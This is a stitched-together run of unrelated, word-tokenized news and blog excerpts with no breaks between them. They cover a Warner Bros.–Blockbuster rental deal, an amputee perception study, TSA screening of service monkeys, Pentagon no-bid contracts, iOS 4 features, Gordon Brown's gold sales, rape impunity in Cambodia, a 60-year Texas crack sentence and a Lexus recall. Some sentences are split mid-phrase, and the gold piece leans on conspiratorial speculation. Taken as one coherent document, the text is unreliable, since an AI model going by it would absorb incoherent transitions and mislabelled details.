Warner Bros. , the same movie studio that has recently announced " deals " with Netflix and Redbox to delay the DVD release of its titles for 28 days , has announced a new agreement with movie rental company Blockbuster .
Unlike to its previous deals , however , the new agreement makes Warner 's titles available immediately in Blockbuster 's dying brick - and - mortar stores , by mail , and on - demand .
" Warner Bros . and Blockbuster have enjoyed a cooperative and successful relationship for more than 25 years , " Warner Home Video president Ron Sanders said in a statement .
" The updated agreement will continue to provide Blockbuster customers with access to Warner Bros. titles the same day they are released . "
At the risk of abusing an already overused phrase : Wow .
Just wow .
In its announcement , Warner reaffirmed its commitment to assuring that Blockbuster remains the " only multichannel provider that has every hot new movie on the day of its release . "
Indeed , with the agreements it struck with more innovative and competitive movie rental services like Netflix and Redbox , Blockbuster really is the only mainstream way for people to get movies on release day without buying them .
Blockbuster , of course , has been bleeding money for some time now .
The company has been entertaining the idea of bankruptcy for close to a year now and has closed nearly a thousand stores in recent years .
In fact , my peers and I have long wondered how the Blockbuster near my place has remained open , but the telltale " store closing " signs finally popped up in the windows this week .
So what in the world is Warner Bros. thinking ?
It 's hard to see how Blockbuster could be paying more per rental than companies that are actually in the black , but the good relationship Blockbuster has fostered with the movie studios in the past has undoubtedly helped .
The stores are also known for selling DVDs , so perhaps Warner enjoys this extra sales boost , no matter how tiny .
From this vantage point , this looks like a case of old media propping up old retail .
The deal may buy Blockbuster a few extra months of life , but it 's not going to win Warner Bros .
any fans .
We know exactly where an object is when we say it is " within the reach of our hand . "
But if we do n't have a hand , can we still see the object just where it is ?
Apparently not , say researchers at the Hebrew University of Jerusalem and Hadassah Hospital - Mount Scopus .
The space within reach of our hands -- where actions such as grasping and touching occur -- is known as the " action space . "
Research has shown that visual information in this area is organized in hand - centered coordinates -- in other words , the representation of objects in the human brain depends on their spatial position with respect to the hand .
According to new research published in Psychological Science , a journal of the Association for Psychological Science , amputation of the hand results in distorted visuospatial perception of the action space .
The article was written by neuroscientists Dr. Tamar R. Makin , Meytal Wilf and Dr. Ehud Zohary of the Alexander Silberman Institute of Life Sciences at the Hebrew University of Jerusalem along with Dr. Isabella Schwartz of Hadassah Mount Scopus Hospital in Jerusalem .
They sought to investigate how hand amputations affect visuospatial perception in near space .
Volunteers with either left - or right - hand amputations participated in this experiment .
They were instructed to look at a central cross on a screen while two white squares were briefly shown to the left and right side of the cross .
The volunteers had to indicate which of the squares was farther away from the cross .
The results reveal that hand amputations affect visuospatial perception .
When the right square was slightly farther away from the center , participants with right - hand amputations tended to perceive it as being at the same distance from the center as the left square ; this suggests that these volunteers underestimated the distance of the right square relative to the left .
Conversely , when the left square was farther away , left - hand amputees perceived both squares as being equally far away from the center -- these participants underestimated the left side of near space .
Interestingly , when the volunteers were seated farther away from the screen , they were more accurate in judging the distances , indicating that hand amputations may only affect perception of the space close to the body .
The findings suggest that losing a hand may shrink the action space on the amputated side , leading to permanent distortions in spatial perception .
According to the researchers , " This shows that the possibility for action in near space shapes our perception -- the space near our hands is really special , and our ability to move in that space affects how we perceive it . "
The researchers note that these results have implications for spatial hemineglect -- a condition ( often following brain injury ) in which the patient cannot perceive objects on one side of space .
This condition is very often associated with paralysis of the hand in the neglected side , which , based on the current study , might exasperate the perceptual neglect .
The authors suggest that , based on their findings , " current rehabilitation approaches that emphasize action on the affected side may reverse this process . "
For example , encouraging the use of the affected hand or by providing visual feedback ( through prism adaptation or mirrors ) may help overcome hemineglect by increasing the size of the action space on the affected side .
###
A COURT has ordered a hospital in northern Italy to pay 180,000 euro ( $ 262,716 ) to a man after surgeons removed a healthy testicle in error .
The plaintiff , who was 27 at the time of the operation in 2004 , had a tumour in the left testicle but the healthy one was removed , the Arena di Verona newspaper reported .
The surgeons quickly realised their mistake and removed the left testicle as well , the report said .
Chess is one of those fun stuffs in the world of games .
If one needs to enquire about the history of chess , it could be dragged back to Persia and India where this game is in vogue for several centuries now .
As such the best places to find masters of this game was obviously the continent of Asia in the early days , but with time the game spread across the globe and gained popularity with different people and different races .
Not just the game , innovativeness has prompted the manufacturers of chess boards to come out with interesting designs and hence enhance the interest in playing the game .
One could find different types of designs in the chess boards with variances in the shape of the board which may include 2D or 3D designs as well as the components of the game like the warriors of the game given different designs .
1. 3D Chess Set
2. Art of War Chess Set
3. 3 - Way Chess set
4. Lego Chess Set
5. Star War Chess Set
6. Wiggly Chess Set
7. Amorphous Organic Chess Set
8. Good and Evil Chess Set
9. Angels vs Demons Chess Set
10 . Wild Animals Chess Set
11 . Alice Chess Set
12 . Renault F1 Team Chess Set
We Recommend :
What to Do With Your Monkey at the Airport TSA officers from time to time have to deal with the surprising service monkey .
April 7 , 2010  --
Where would a monkey hide explosives ?
It 's not a question most people would think to ask , but for those in charge of airport security the query is not as outlandish as you might think .
From time to time , Transportation Security Administration officers come across a disabled passenger traveling with a " service monkey . "
Like seeing eye dogs that help the blind , service monkeys assist mobility - impaired people and use their hands for functional tasks that their owners cannot perform .
Service monkeys help their owners by retrieving dropped items such as phones and remote controls from the floor , loading DVDs , pushing buttons on TVs and computers , opening bottles of water , turning pages of a book , adjusting reading glasses , repositioning an arm or a leg on a wheelchair after a muscle spasm and a wide variety of other activities .
Helping Hands : Monkey Helpers for the Disabled , a Boston - based charity that is the only IRS - certified charity in the country providing service monkeys , trains Capuchin monkeys , tiny mammals indigenous to South America that average about 6 to 10 pounds .
The monkeys are live - in companions and can spend as much as 20 to 30 years with their owners .
Though very rare -- Helping Hands has placed just 137 service monkeys since its founding in 1979 -- they can present a unique challenge for TSA officials .
The monkeys must go through airport security checkpoints like the rest of us , but screening a monkey is n't exactly like checking your typical businessman or even a screaming infant .
The TSA does not collect data on the number of service monkeys that come through its checkpoints , but there are enough that the government agency created a section of its
Web site dedicated to the animals and the special guidelines for screening them .
Stay Up to Date on the Latest Travel Trends from ABC News on Twitter
" TSA Security Officers are trained not to touch , feed or play with service animals , " said TSA spokesman Greg Soule .
" The animals are screened with the assistance of the handler , who must remove the animal from its enclosure and keep it controlled on a leash .
With the handler 's assistance , the officer will conduct a thorough inspection of the animal . "
The monkey also has to go through the metal detector , preferably walking through it while on a leash .
The TSA agents do not touch the monkey , but leave it up to the handler to interact with it .
The inspection process may require the handler to take off the monkey 's diaper as part of a visual inspection .
Service Monkeys Helpful , But Are They Safe ?
So even after all that , do they really let monkeys on airplanes ?
Dogs , monkeys and other animals used to help disabled passengers are typically allowed into the cabin with everybody else .
Soule noted that TSA does not regulate the types of service animals allowed on planes , saying that the determination is made by each individual airline .
Passengers with service animals are encouraged to inform security officers that the animal is accompanying them as a service animal and not as a pet , Soule said .
" This provides passengers the opportunity to move to the front of the security line since the officer may need to spend more time with them , " he said .
It also gives the TSA the chance to bring the monkey to a table for a private inspection , and doubtless offering a lot of people an opportunity to stop and gawk .
And then there is a question of safety .
Just last week Joseph Hamric , a 60 - year - old man in Chesapeake , Va. , was attacked by his service monkey , Noah .
Noah was out of his cage to eat pork chops when he turned on his owner .
Hamric , a Vietnam vet , got the monkey to help him cope with post traumatic stress .
The attack started when Hamric accidently stepped on the Noah 's tail .
The monkey snapped back , locking onto Hamric 's thumb , then cut his vein and ligaments in his wrist .
Hamric was treated and released from a local hospital and decided , at the urging of local animal control officers , to give up the monkey .
At least , he was n't at 30,000 feet at the time .
Megan Talbert , executive director of Helping Hands , said that monkey was not one trained by her group .
" It is important to note that Helping Hands service animals are individually and professionally trained to perform tasks for individuals who are physically disabled as a result of spinal cord injury or disease .
Our service monkeys are not trained to provide emotional support for people with PTSD or other anxiety disorders , " she said .
Talbert said the organization flies about once a month with a monkey to place it with a new owner .
The group informs the TSA of its travel plans about a week beforehand .
" We alert them anytime one of our animals is going to fly , " Talbert said .
" They 're wonderful .
They 've been very , very helpful . "
Once on the plane , the monkeys are held in carriers underneath the seats in front of the Helping Hands members , preventing any onboard safety risk to passengers .
Talbert said it would be highly unusual for somebody else to be flying with a monkey .
" The people we place monkeys with are so severely disabled that it 's very difficult for them to travel long distances outside their home , " she said .
" It 's more than likely that if they travel , one of our monkeys would stay at home with a friend or neighbor . "
The monkeys are trained to be service animals for the home , not for public spaces , she said .
" It 's not like they would be able to help somebody on vacation , " Talbert said .
" So it 's very , very rare that a client would travel with their monkey . "
According to White House budget estimates , it costs roughly $ 1 million a year to support the deployment of a single soldier to Afghanistan .
Ever wonder why it costs so much ?
Landlocked country , long supply lines , poor infrastructure , yadda yadda .
But how about another possible contributing factor :
The reliance of the Pentagon 's main supply agency on no-bid contracts ?
Newsweek 's stellar Declassified blog got the Defense Logistics Agency ( DLA ) to fess up to awarding $ 1.4 billion in no-bid contracts to two shady foreign entities to supply aviation fuel to U.S. military bases in Kyrgyzstan and Afghanistan .
In a statement to Declassified , DLA confirmed that it had awarded contracts to two firms , Mina Corp. and Red Star Enterprises , under federal procurement guidelines that allow " contracting without providing for full and open competition . "
That 's problematic for a number of reasons :
For starters , allegations of crooked base supply deals helped lead to the violent overthrow of the government of Kyrgyzstan .
And leaving aside the question of whether the United States deliberately turned a blind eye to corruption in a strategically located Central Asian state , let 's turn to another point :
Why the hell is DLA awarding no -bid contracts on this scale ?
It 's not just limited to fuel contracts .
DLA , for instance , has also given major sole - source awards to Hesco Bastion , the U.K. firm that manufactures the ubiquitous sand - and - soil - filled perimeter defenses seen at U.S. bases throughout the Middle East and Central Asia .
An Illinois company , Infrastructure Defense Technologies , recently submitted a formal protest with the Government Accountability Office in a bid to overturn DLA 's most recent award to Hesco , claiming that the agency had unfairly given a monopoly on defensive barriers to Hesco .
It 's worth pointing out here that Infrastructure Defense Technologies unsuccessfully sued DLA in the Court of Federal Claims over the same issue .
The website of the powerhouse law firm Patton Boggs , which successfully represented Hesco in the case , notes that the court ruled Hesco " was properly awarded the sole source contract because only the Hesco product could meet the government ’s stated needs for the procurement . "
That 's essentially the same rationale that DLA offered to Declassified for its no -bid award to Red Star , described as " " the only company that had the capability to meet operational needs . "
But saying that does n't necessarily make it so .
We 've covered some dubious " sole - source " awards before – the procurement of Russian helicopters , for instance – and it's easy to detect a pattern :
In cases where the government grants someone an exclusive rather than seeking multiple quotes , it usually ends up paying a much higher price .
Shortly after taking office , President Barack Obama vowed to limit no - bid contracts , saying that contracting overhaul could save taxpayers billions of dollars a year .
One wonders if anything at all has changed .
[ PHOTO : U.S. Department of Defense ]
The curtain has been pulled back on iPhone 4 , and the list of new features is massive :
There 's multitasking ( finally ! ) , a refreshed interface , and literally hundreds of other changes , all coming this summer .
Here 's the rundown .
Advertisement
The new OS will ship in June ( Fall for iPad , and a developer preview is available today , so we can expect to have plenty of apps updated and ready for launch .
New Features : Multitasking , App Folders and More
Advertisement
• Multitasking :
It 's here , finally .
It 's handled with a simple task switcher : double click your home button , and you get a list of running apps .
Select , switch , done .
Multitasking is limited to audio streaming , VoIP and GPS apps , as well as a few other allowances : they can finish specific , important tasks in the background , for example .
As far as non-music / nav / VoIP apps , those can be suspended in the background , but not left running .
( See below . )
Full details here .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
• Fast app switching : With iPhone 4's multitasking , most apps are n't actually running in the background — just certain functions of the app , like an audio stream or a GPS lock .
But !
All apps can now be frozen , in full , so that when you reopen them , they 're restored to exactly the state they were in when they were closed .
• Local notifications : Notifications can be sent between apps on the phone , not just from remote servers .
In other words , if something important happens in an app you 've opened and moved away from , a notification will pop up in whatever app you 're using at the time , effectively saying " switch back to me ! "
It 's a fairly clever way to keep track of multiple apps without the need for a start bar or dock - type interface .
From Apple 's dev guidelines :
The advantage of local notifications is that they are independent of your application .
Once a notification is scheduled , the system manages the delivery of it .
Your application does not even have to be running when the notification is delivered .
Advertisement
Apple 's official line :
i Phone OS 4's new multitasking offers users a new way to quickly move between apps , and provides developers seven new multitasking services to easily add multitasking features to their apps .
These services include background audio , so apps like Pandora can play music in the background , and VoIP , so VoIP apps can receive a VoIP call even when the iPhone is asleep or the user is running other apps .
i Phone OS 4 provides multitasking to third party apps while preserving battery life and foreground app performance , which has until now proved elusive on mobile devices .
Advertisement
And some more technical details , again from Apple 's developer guidelines :
An application can request a finite amount of time to complete some important task .
An application can declare itself as supporting specific services that require regular background execution time .
An application can use local notifications to generate user alerts at designated times , whether or not the application is running .
Advertisement
• App folders :
Now you can sort your apps into folders !
That 's homescreen clutter solved , just like that .
Apple 's description :
Folders help users better organize and quickly access their apps .
Simply drag one app icon onto another , and a new folder is automatically created .
The folder is automatically given a name based on the App Store category of that app , such as " Games , " which the user can easily rename .
Using folders , users can now organize and access over 2,000 apps on their iPhone .
Advertisement
2160 , to be exact .
Advertisement
• A new Mail app : Unified inboxes , multiple Exchange accounts , fast inbox switching , threaded messages :
These new features are actually a huge deal , since the iPhone 's mail client has barely changed since 2007 , and Apple does n't allow alternative mail apps .
Apple 's pitch :
i Phone OS 4 delivers the best mail experience on a mobile phone with its new Unified Inbox , allowing users to see messages from all their email accounts displayed together in a single inbox .
With just a few taps , users can quickly switch between inboxes to see messages from any single account .
Advertisement
• iBooks :
Oh hey , that iBooks ebook reader app and accompanying ebook store we first met on the iPad has ambled on down to the iPhone .
Nice , since you can now take your books with you wherever you go , as oppose to wherever you go with your iPad .
Advertisement
• Custom backgrounds : Jailbreakers have them .
Hell , the iPad has them .
Now you can choose a persistent background for your iPhone — and not just for the lockscreen .
• Game Center : Apple 's going to roll out a centralized gaming service — a multiplayer network like PSN or Xbox Live — to help connect games to one another , by the end on the year .
There are 3rd - party services that already do this , like OpenFeint .
They will probably die .
Full details here .
Advertisement
Advertisement
• iAd advertising :
It looks like Apple 's finally making use of Quattro , that mobile ad company it gobbled up a few months ago , by rolling out its own advertising platform , a turnkey ad plugin for app developers called iAd .
The theory here is that instead of relying on links to external websites , which pull users out of apps whenever they tap on an ad , developers can use Apple 's new tools to keep people in the app while still showing them advertising — sort of like popover browser windows .
You can watch videos , play games , and even buy apps from within these ads .
This is in the iPhone OS 4 developer tools , but it 's not explicitly a part of OS 4 , so you wo n't see apps with iAds until later this year .
Full details here .
Advertisement
• 5 x digital zoom : Could this hint at a higher quality camera in the next hardware ?
3.2 megapixels seems a bit low for 5 x digital zoom .
• Bluetooth keyboards : Another carryover from the iPad , Bluetooth keyboard support will finally come to iPhone 4 .
Advertisement
• A bevy of other new developer features , including 1500 new APIs to play with : See here for more details .
The Hidden Features
Now that we 've had a few days to use the OS , we 've compiled a huge list of features not covered in the keynote .
Advertisement
Which Devices Get It , and When ?
Advertisement
When the software ships in the summer , iPhone 3GSes and iPod Touch 3rd - gens devices will get all of the new features .
The iPhone 3G and Touch 2G will get " many things , " which does n't include multitasking .
I repeat : the iPhone 3G wo n't get multitasking , ever .
i Phone 2Gs will be left on a hillside somewhere to die of exposure , or something .
Apple did n't drop any clues about the next iPhone 's hardware , but it 's a fair bet that we 'll see some changes come June .
Advertisement
What About the iPad ?
Advertisement
The iPad wo n't get the 4.0 upgrade until Fall of this year , a few months after the iPhone does .
So , you 'll be able to multitask on your dinky little iPhone before you 'll be even be able to listen to Pandora and check your email at the same time on your giant iPad .
[ iPhone 4 on Giz ]
I ’ve finally found a solution to battlemat woes .
For years now I ’ve been to -ing and fro-ing with flipmats , tiles , drywipe mats , all sorts .
all in a futile attempt to get a fair representation of the WotC maps onto my table .
Just when I thought there was no help on the horizon I stumbled across Poster Razor .
Here ’s what I prepped for last nights game , it took 5 minutes .
It ’s so simple .
you grab one of the untagged maps from the main WotC site .
They have loads , including all the maps from Demon Queen ’s Enclave ( which would be a nightmare to reproduce any other way ) .
Save them to your desktop .
Fire up Poster Razor and it turns the image into a PDF that lines up asll the different sheets for you .
You can scale the map directly from that program , no image software needed .
I did it all on a netbook .
Mess around a bit , I recommend having 6 squares of map across a single A4 sheet .
Hit save .
You now have a PDF that is extremely memory friendly .
E-mail it to work , print it .
Take a couple of minutes with scissors and tape and you ’re done .
I ca n’t recommend this highly enough .
Awesome .
One of the bigger stories in the UK over the past several days , has been the increasing pressure on Prime Minister Gordon Brown to justify his sale of 395 tons of gold in 17 auctions in the period from 1998 through 2002 , when Brown was Chancellor of the Exchequer , a role identical to the one Tim Geithner now performs in the US as Treasury Secretary .
The issue is that in the abovementioned period , gold was trading at the rock bottom prices of the past two decades , and as such his rush to sell is estimated to have cost UK taxpayers £ 6 billion .
One reason previously given to Parliament , to explain the transactions from Treasury ministers and Tony Blair was that the sale was made ' on the technical advice of the Bank of England . '
Today the UK Treasury has released long - withheld FOIA documents which disprove this claim , and indicate that in fact the BOE was if not completely against selling the bullion then certainly waiting until the price improved .
Furthermore , as the Daily Mail reports , " A source close to the Bank of England said last night : ' It was not our decision .
It was their decision and we simply provided technical advice .
Then it was up to them . ' "
Yet , in light of recent LBMA manipulation revelations by GATA , it was most likely the association itself and its member banks which pressed the then relatively new Chancellor to do something against the interest of his people , potentially with promises of further rank extension in the " public services " arena .
So far , they have not disappointed .
As part of the FOIA , ( Full document attached below ) it becomes clear that Brown attempted at least 4 tried to persuade the BOE to proffer a joint proposal from the Treasury and the Bank Of England as pertains to English gold sales in the late 1998 period .
And even as the FOIA submission is now making the round , there is still a critical redaction .
To wit , from the Daily Mail :
Two days before Christmas 1998 - just a month before the sale was announced - a senior Treasury official wrote to the department 's then permanent secretary Gus O'Donnell : ' The Chancellor is keen that officials at the Treasury and the Bank work together to produce a joint proposal .
As I understand it the latest proposal is not a joint one .
' The Chancellor needs to know the status of the proposal , what the difficulties are in drawing up a joint proposal , how you think we can move forward in achieving a joint proposal . '
Three weeks later Mr Brown met the then Bank Governor Lord George for lunch to discuss the plan .
But the outcome of the talks is unclear because the Treasury has blacked out a key section of the only note referring to it .
Lord George offered only the most lukewarm endorsement of the decision at the time , telling MPs it was a ' perfectly reasonable portfolio decision ' .
If he had refused to agree to the sale he would almost certainly have had to resign .
Surely , Gordon Brown , facing with some very daunting poll numbers ahead of upcoming elections , will now have even more explaining to do .
Yet what mostly caught our attention was Annex # 29 to a Bank Of England paper from September 28 , 1998 , in which the following was said :
The US treasury sold gold in two spells , two auctions of 23 and 15 tonnes in 1975 , which were not continued in 1976 as the IMF auctions were announced and the spot price fell ; a larger programme of 491 tonnes during 1978 - 1979 as the gold price rose sharply .
Indeed the second programme was extended three times as demand for gold continued to push up the spot price .
The US Treasury used a multi- price auction system initially with open bids , but switched to closed bigs by the end because open bids were causing market disruption [ ca n't have a transparent market now , can we ] .
The auctions in 1979 offered two grades of gold : 995 fine and 900 fine .
It is not clear whether this was a market - driven switch , or whether it reflected the US Treasury 's preference .
Now correct us if we are wrong , but ( London ) Good Delivery standards by the LBMA have called for 995 and higher fineness since time immemorial .
How is it that the US Treasury decided to dilute the content of its gold dispositions precisely at the time when gold prices were surging .
And , more relevantly , why ?
Recall that in the period January 1979 - January 1980 gold price / toz went from $ 240 to $ 850 !
Did the US , for whatever reason forced to sell into the run up , need to dilute gold holdings due to a massive shortage of physical ?
By doing so , did the UST force buyer to sign " big boy " letters fully acknowledging that they were getting less than Good Delivery gold ?
Was this 10 % dilution merely the first step in what Adrian Douglas recently highlighted would be the transition of gold claims holders into general unsecured creditors ?
If a 4 x run up in gold forced the US Treasury to enact a 10 % real dilution in gold , what would happen if gold surged 40 x ?
Would the fineness of the adjusted " good delivery " drop to 100 or lower ?
Forget the LBMA and the threat of physical dilution - a much more relevant question is just how much of the alleged US gold holdings of 8133.5 tonnes is actually real .
Surely , the question of just how much gold is there below the HSBC building in New York 's Bryant Park , and below the FRBNY has never been more relevant .
Full HM - Treasury FOIA .
PHNOM PENH , Cambodia – For Meas Veasna , as with many survivors of sexual violence , rape brought only the beginning of the horror .
Veasna , a 20 - year - old married mother of two , was allegedly raped by a monk in her home province of Prey Veng in June 2009 .
Her life since that time has fallen apart ; because of the stigma Cambodian culture attaches to being raped , her husband ’s family will not allow her to see him or her children .
She has been forced to move to Phnom Penh on her own to find work .
Meanwhile , the monk remains free , never having been tried in court because he refuses to appear .
All across Cambodia , this sort of impunity enables rapists and victimizes women over and over , according to a recent report from Amnesty International that found that incidents of sexual violence — especially the rape of children — have increased in recent years .
Police documented 468 cases of rape , attempted rape and sexual harassment between November 2008 and November 2009 , a 24 - percent increase over the previous year , Amnesty reported .
The portion of rapes reported to human rights organization ADHOC that involved children jumped from 67 percent in 2008 to 78 percent in 2009 , and many more rapes go unreported , according to Amnesty .
ADHOC , the Cambodian Human Rights and Development Association , is an NGO that lobbies for better policies for providing health and education services , improving labor and food condition , reducing poverty and preventing land - grabbing .
The incident involving Veasna occurred a few weeks after she had given birth to her second child and went to Wat Kaley pagoda for a ritual involving holy water .
While she was there , a monk allegedly drugged and raped her , fleeing only when Veasna ’s husband came to her rescue .
Police took her statement , but since then nothing has happened , Veasna said in an interview last week .
She wants justice , but is beginning to despair , as the monk refuses to appear in court and investigations have ground to a halt .
Amnesty ’s report suggests that a guilty verdict might vindicate Veasna and allow her to return to her family , but she has her doubts .
“ I want the police to arrest him , but I think it ’s useless for me to continue with the case ; every time I go to the police , they question me , but then there is just silence , ” Veasna said .
“ I think my husband cannot take me back , because in his eyes I am dirty . ”
Her husband continues to be supportive , exerting what little pressure he can to urge police to investigate and the courts to act .
That a rape survivor would emerge from the incident with her reputation in tatters is not unique to Veasna , according to Sina Vann , team leader for Voices for Change , a program of the Somaly Mam Foundation .
The Somaly Mam Foundation is an NGO that seeks to combat human trafficking through advocacy , education and by empowering survivors to tell their stories to the world .
Vann herself , now 26 , was taken from her home in Vietnam at the age of 12 and sold into sex slavery in Cambodia before being rescued as a teen by AFESIP ( Acting for Women in Distressing Situations ) , another organization co-founded by Somaly Mam .
Young girls or women who are raped often turn to sex work because they see no other option given the stigma that accompanies rape , she said .
Ironically , convicted rapists who gave interviews to Amnesty International said they experienced no stigma for their crimes .
“ I have n’t heard of anyone looking down on me in the village , and not here in the prison either ; there are so many here who have done bad things , ” one man named Meng , who was convicted and sentenced to 14 years for the rape of two girls , ages 9 and 10 , told Amnesty International .
The report urged the Cambodian government to publicly condemn rape and other sexual violence , and to end the complacency that contributes to the impunity rapists enjoy .
The government must change its policies to ensure that police investigate allegations of rape and that the courts hold rapists accountable , the report said .
Cambodia , it said , also should address the government ’s failures to provide victims with adequate reparations , including health and psychosocial services .
For now , NGOs such as ADHOC are trying to pick up the slack .
When she found herself essentially homeless , Veasna went to the organization , which agreed to represent her in court , and helped her find a job in Phnom Penh working with needy children .
But Veasna longs for her old life .
“ It ’s hard for me now , because I used to have my children .
I used to have my husband with me , ” she said .
“ But now , I am all alone , and lonely . ”
Thank you for visiting our Web Site
Visit us again soon we always add new beautiful Bronze and Marble fountains , sculpture , statues .
A sk about our CUSTOM WORK
It is our pleasure to help you .
The bill has caused ripples across the technology world , most notably because of its proposals regarding the suspension of repeat filesharers ’ internet connections and a recent proposal from the Liberal Democrats giving the High Court the power to issue an injunction against a website accused of hosting " substantial " amounts of copyright - infringing material .
This latest amendment , which the House of Lords passed by 165 votes to 140 at the beginning of March , means that websites such as YouTube – which has , in the past , been criticised by record labels and media companies for hosting unsanctioned video clips of their artists or TV shows – could be shut down .
Think 35 years for a brick or so of pot is bad ?
Try this one on for size ...
In a case one local defense attorney has said showed " shades of Tulia , " a Bay City man was sentenced to 60 years in prison for possessing 1.3 grams of crack .
Melvin Johnson III , 35 , was convicted of possession with intent to deliver in January at the Matagorda County Courthouse .
His sentencing was held amid very tight security -- Johnson was shackled and extra deputies were brought in to conduct Johnson to and from the courtroom .
According to the Bay City Tribune , observers feared violence because Johnson had refused to place his thumbprint on his judgment of guilt the court had entered an hour before .
At his trial , assistant DA Carla Post seemingly attempted to portray Johnson as the crack kingpin of Bay City .
Under her direct examination , a Matagorda County sheriff told the court how his department had kept Johnson 's alleged crack - peddling operation under surveillance and had acted on " the covert assistance of local citizens " in building their case .
Using that information , they approached a local magistrate who signed a warrant .
Three days after the warrant was signed , Johnson 's home was stormed by a SWAT team as Johnson 's teenaged son played basketball in the driveway .
The Matagorda County cops explained the delay between the signing of the warrant and its execution on their needing time to bring in the SWAT team -- Johnson does have a felony conviction for retaliation on his record .
After scouring the house , they found two crack - rocks weighing a total of 1.3 grams in the pocket of a jacket hanging on the door .
That little pocketful of stones got Johnson six decades in TDCJ .
( It bears mention that a United States dime weighs 2.2 grams .
Crack kingpin Johnson was found to be in possession of one - half of a dime 's weight in cocaine . )
The jury believed Matagorda County DA 's Post and Steven Reis when they contended that there was no evidence that Johnson was manufacturing or using his tiny stash of cocaine .
The two prosecutors stated that " all the evidence supported only the ' reasonable deduction and common - sense belief that Johnson possessed these drugs to sell them , ' " and narcotics investigator James Nesbitt testified that " known crackheads " frequented Johnson 's residence .
Cary Faden , one of Johnson 's attorneys , asked Nesbitt if he could prove that Johnson was at home every time these known crackheads came calling .
Nesbitt admitted that he could not .
And Johnson 's other defense lawyer , Michael Diaz , countered that there was no way to telepathically divine Johnson 's intent .
The jury disagreed .
Johnson was convicted .
Since he had a felony conviction , and because intent to deliver is a more serious charge than simple possession , and maybe , just maybe , because Bay City is a merciless little town that lives up to the Texas stereotype about drugs and black defendants , Johnson was sentenced to 60 years .
" It 's just pointless , " says Scott Henson , of the award - winning state criminal justice blog Grits For Breakfast .
" Even if you are the most law - and - order person in the world , there is simply no point in sending someone to jail that long for a gram of crack .
All it does is make you feel good for being retributive . "
Indeed , according to the Bay City Tribune , it did appear that the jurors felt pretty satisfied with what they had done .
It was reported that after the proceedings , they palled around with the prosecutors .
" We live in this town and raise our children in this town , " one of the jurors told the DAs .
" We want to help clean up our city . "
And burden the rest of us with feeding and housing this guy until 2070 .
Henson believes that these kind of sentences are a " luxury " the state of Texas can no longer afford .
He says that in 2007 , many of the larger , more urban counties realized the magnitude of what was then a looming prison - bed shortage and have since availed themselves of greatly enhanced statewide diversion programs for drug offenders that have strong probation sentences as their centerpieces .
Accordingly , the prison - bed shortage never materialized , as counties like Harris , Dallas , Tarrant and Travis scaled back the incarceration of low - level drug offenders .
But Henson thinks the smaller counties , like Smith ( site of the 35 - year pot sentence ) and Matagorda , have n't got the memo yet .
" These crazy - long sentences are still the culture there , " he says .
" These sentences were supposed to be thwarted by the diversion programs , but these places have n't got the message yet . "
Matt Simpson , policy strategist for the Texas American Civil Liberties Union , points out that incarcerating Johnson for his full 60 - year sentence will cost Texans over a million dollars .
" How much drug education could you buy for a million dollars ? " he asks .
" How many rehabilitation programs could you fund for that money ?
Is this the highest and best use for the state 's money in this case ? "
And expenses like this take on greater import with the state and many municipalities facing budget shortfalls .
Governor Perry has stated that he wants a five - percent budget cut for TDCJ .
Henson has an elegant little solution : an across the board discount in drug penalties .
He would have them max out at what is now a second - degree felony instead of first .
Less than a gram possession would be a Class A misdemeanor .
" Simultaneously , he writes , " they should invest a portion of the savings in stronger probation and reentry programs . "
Besides just being fair and the right thing to do , the move would immediately reduce pressure on the prison system , allowing the state to save money by closing prison units or eliminating private prison contracts .
Other states are considering similar measures in light of the budget crunch ; most recently Colorado saw legislation filed along these lines .
The biggest complaint would come from overcrowded county jails do n't want to deal with offenders currently sent off to so - called " state jails " for the equivalent of fourth - degree felonies .
But those extra prisoners could be more than offset by similarly ratcheting down marijuana penalties in the misdemeanor range .
That would make low - level pot possession cases ( less than 2 oz ) a Class C misdemeanor that generates ticket revenue instead of a Class B which clogs up misdemeanor courts and runs up unnecessary indigent defense bills , generating cost savings at all levels of government .
( Where are the small government conservatives when you need them ? )
Where indeed ?
A software update , available by the end of the month , will solve issues with the electronic stability control system on the 2010 Lexus GX 460 sport-utility vehicle , says Toyota Motor Sales .
Last week , Toyota had promptly halted sales of the GX 460 after Consumer Reports noted an unexpected handling behavior , and possibly a malfunction of the electronic stability control system .
The test behavior , in which the stability system allowed the back of the vehicle to slide out sideways when the driver lifted abruptly off the accelerator while going tightly around a corner ( lift - off oversteer ) , could potentially result in a higher chance of rollover if the vehicle were tripped by a curb , dropoff , or change in surface .
Consumer Reports subsequently gave the 2010 Lexus GX 460 a rare " Do n't Buy : Safety Risk " designation .
Toyota later confirmed that its own engineers had duplicated the behavior
Curiously , there 's more to the story .
Now Toyota Motor Corporation has also released a confession of sorts , explaining that several different conditions contributed to the issue :
- In the GX 460 and Land Cruiser Prado , heavy components , such as the fuel tank , are located on the left side , and in left - hand drive versions , the left side is made even heavier because of the presence of the driver .
- For vehicles with certain tires ( on 18 - inch wheels ) and equipped with the Kinetic Dynamic Suspension System ( KDSS * ) and VSC , the activation of the VSC may not be sufficient in certain circumstances due to the setting of the VSC program .
- Circumstances may require advanced driving skills , such as sharp turns of the steering wheel in high - speed conditions or negotiating a curve to the right at excessive speeds .
It 's an unusual ( albeit indirect ) admission — suggesting that Toyota did n't retest the vehicle 's stability system for several key ( U.S. - market ) differences ( like weight distribution , tires , or suspension ) versus the closely related Toyota 4 Runner and Toyota Land Cruiser Prado .
But as for the third point — that advanced driving skills might be required for sharp turns — is n't stability control expected to help with those sorts of emergency maneuvers ?
The recall now affects about 13,000 Lexus GX 460 models globally , including 9,400 in the U.S. , plus about 21,000 units of the Toyota Land Cruiser Prado ( a model not sold in the U.S. ) that are left - hand - drive and equipped with both KDSS and VSC , and the fix will take about an hour .
U.S. owners will be notified in the mail starting in early May , but they can also contact Lexus Customer Satisfaction , at 800- 255-3987 ; until a fix has been provided courtesy vehicles are on offer for those concerned about the issue .
And in the meantime , check out the video below , which helps show the differences between vehicles with the fix and those without .
[ Toyota Motor Corporation ]
A hole in your favorite sweater , jeans or tablecloth does n't have to be a tragedy .
Instead , turn that tear into something beautiful by mending it with embroidery .
Covering up a hole or stain with an embroidered patch is one way to fix the damage , but you 'll find that you can also use the embroidery itself to repair .
And just as no two holes are the same , the solutions will differ as well .
Look through this list of ideas and techniques to find your next visible mending method !
